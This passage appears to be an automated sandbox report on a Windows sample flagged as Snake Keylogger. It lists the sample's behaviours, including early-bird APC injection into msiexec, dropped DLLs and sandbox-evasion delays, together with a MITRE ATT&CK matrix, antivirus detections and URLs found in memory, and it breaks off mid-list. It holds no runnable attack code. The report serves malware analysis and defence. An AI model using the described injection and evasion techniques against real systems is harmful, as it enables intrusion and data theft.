Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6268			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3485			Jump to behavior

Source: C:\Users\user\Desktop\AwMu7gR48D.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nspE492.tmp\UserInfo.dll			Jump to dropped file
Source: C:\Users\user\Desktop\AwMu7gR48D.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nspE492.tmp\Banner.dll			Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2572	Thread sleep time: -10145709240540247s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 4536	Thread sleep time: -130000s >= -30000s			Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\AwMu7gR48D.exe	Code function: 0_2_00406232 FindFirstFileA,FindClose,	0_2_00406232
Source: C:\Users\user\Desktop\AwMu7gR48D.exe	Code function: 0_2_004056F7 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_004056F7
Source: C:\Users\user\Desktop\AwMu7gR48D.exe	Code function: 0_2_004026F8 FindFirstFileA,	0_2_004026F8

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\AwMu7gR48D.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\AwMu7gR48D.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\AwMu7gR48D.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\AwMu7gR48D.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Users\user\Desktop\AwMu7gR48D.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates	Jump to behavior
Source: C:\Users\user\Desktop\AwMu7gR48D.exe	File opened: C:\Users\user	Jump to behavior

Source: msiexec.exe, 00000005.00000003.2502788314.00000000061F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2613416047.00000000061F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111145432.00000000061F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2557342511.00000000061F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2417445942.00000000061F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221518528.00000000061F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584889218.00000000061F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2678783138.00000000061F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2027647702.00000000061F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2083790654.00000000061F8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW-
Source: msiexec.exe, 00000005.00000003.2502788314.00000000061CF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2502788314.00000000061F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584889218.00000000061CF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2613416047.00000000061F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111145432.00000000061F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2557342511.00000000061F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2417445942.00000000061F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221518528.00000000061F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584889218.00000000061F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2678783138.00000000061D0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2678783138.00000000061F8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\AwMu7gR48D.exe	API call chain: ExitProcess graph end node			graph_0-3602
Source: C:\Users\user\Desktop\AwMu7gR48D.exe	API call chain: ExitProcess graph end node			graph_0-3606

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 2_2_0758D55C LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,

2_2_0758D55C

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Early bird code injection technique detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\SysWOW64\msiexec.exe base: 37E0000

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\AwMu7gR48D.exe

0_2_004031BB

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	OS Credential Dumping	111 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 PowerShell	Boot or Logon Initialization Scripts	311 Process Injection	31 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Clipboard Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Access Token Manipulation	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	311 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	3 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	14 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
AwMu7gR48D.exe	58%	ReversingLabs	Win32.Spyware.Snakekeylogger
AwMu7gR48D.exe	100%	Avira	TR/Injector.qhjhe

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\unshabbily\Hardwire\AwMu7gR48D.exe	100%	Avira	TR/Injector.qhjhe
C:\Users\user\AppData\Local\Temp\nspE492.tmp\Banner.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nspE492.tmp\UserInfo.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\unshabbily\Hardwire\AwMu7gR48D.exe	58%	ReversingLabs	Win32.Spyware.Snakekeylogger

Name	IP	Active	Malicious	Antivirus Detection	Reputation
drive.google.com	172.217.19.174	true	false		high
drive.usercontent.google.com	142.250.181.1	true	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.1850926327.0000000005F05000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive.google.com/GT	msiexec.exe, 00000005.00000003.2111129957.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2083732633.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2055895124.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2000433633.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2027572606.0000000006259000.00000004.00000020.00020000.00000000.sdmp	false	high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000002.00000002.1839618822.0000000004FF6000.00000004.00000800.00020000.00000000.sdmp	false	high
https://translate.google.com/translate_a/element.js	msiexec.exe, 00000005.00000003.2529905262.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221488234.0000000006211000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2445849857.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2387184946.000000000625D000.00000004.00000020.00020000.00000000.sdmp	false	high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000002.00000002.1839618822.0000000004FF6000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive.usercontent.google.com/b	msiexec.exe, 00000005.00000003.2111145432.00000000061F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221518528.00000000061F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2027647702.00000000061F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2083790654.00000000061F8000.00000004.00000020.00020000.00000000.sdmp	false	high
https://contoso.com/License	powershell.exe, 00000002.00000002.1850926327.0000000005F05000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/Icon	powershell.exe, 00000002.00000002.1850926327.0000000005F05000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive.usercontent.google.com/	msiexec.exe, 00000005.00000003.2445849857.0000000006213000.00000004.00000020.00020000.00000000.sdmp	false	high
http://www.microsoft.	powershell.exe, 00000002.00000002.1855442072.000000000751A000.00000004.00000020.00020000.00000000.sdmp	false	high
http://nsis.sf.net/NSIS_ErrorError	AwMu7gR48D.exe, AwMu7gR48D.exe.2.dr	false	high
https://github.com/Pester/Pester	powershell.exe, 00000002.00000002.1839618822.0000000004FF6000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive.usercontent.google.com/ie	msiexec.exe, 00000005.00000003.2584839396.0000000006214000.00000004.00000020.00020000.00000000.sdmp	false	high
https://drive.google.com/(gv	msiexec.exe, 00000005.00000003.2276947829.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2248845946.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221488234.0000000006211000.00000004.00000020.00020000.00000000.sdmp	false	high
https://www.google.com	msiexec.exe, 00000005.00000002.2678783138.000000000625E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1971022665.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2529905262.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221488234.0000000006211000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2445849857.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2387184946.000000000625D000.00000004.00000020.00020000.00000000.sdmp	false	high
https://drive.usercontent.google.com/be	msiexec.exe, 00000005.00000002.2678783138.000000000620A000.00000004.00000020.00020000.00000000.sdmp	false	high
http://nsis.sf.net/NSIS_Error	AwMu7gR48D.exe, AwMu7gR48D.exe.2.dr	false	high
https://aka.ms/pscore6lB	powershell.exe, 00000002.00000002.1839618822.0000000004EA1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive.google.com/	msiexec.exe, 00000005.00000003.2529905262.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221488234.0000000006211000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2445849857.0000000006213000.00000004.00000020.00020000.00000000.sdmp	false	high
https://drive.google.com/U	msiexec.exe, 00000005.00000003.2445831272.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2678783138.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2166300357.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584795556.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111129957.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2248826838.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2138530544.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2194101706.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2276930704.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2669151935.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2472874421.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2417373844.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2359320119.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2387184946.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2502712541.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2332761660.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2640640069.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221471719.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2613309927.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2557277262.0000000006259000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2529905262.0000000006259000.00000004.00000020.00020000.00000000.sdmp	false	high
https://drive.google.com/ertificates	msiexec.exe, 00000005.00000003.2387251659.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2083758915.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2276947829.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2138546242.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111145432.000000000620F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2472914379.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2557308514.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2332787687.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2678783138.000000000620A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2502757999.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2640660588.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2248845946.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2359344235.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2417401237.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2529948184.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2194122533.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2669187330.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584839396.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111234763.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2166317047.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2613349162.0000000006212000.00000004.00000020.00020000.00000000.sdmp	false	high
https://drive.google.com/S	msiexec.exe, 00000005.00000003.2111145432.00000000061EE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2027647702.00000000061DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2613416047.00000000061EF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2502788314.00000000061DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2417445942.00000000061EE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2678783138.00000000061DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2584889218.00000000061DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2083790654.00000000061EE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2557342511.00000000061DF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2221518528.00000000061EF000.00000004.00000020.00020000.00000000.sdmp	false	high
https://contoso.com/	powershell.exe, 00000002.00000002.1850926327.0000000005F05000.00000004.00000800.00020000.00000000.sdmp	false	high
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.1850926327.0000000005F05000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive.google.com/n	msiexec.exe, 00000005.00000003.2387251659.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2000450554.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2083758915.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2276947829.0000000006214000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2138546242.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2111145432.000000000620F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2472914379.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2557308514.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2332787687.0000000006212000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2502757999.0000000006213000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 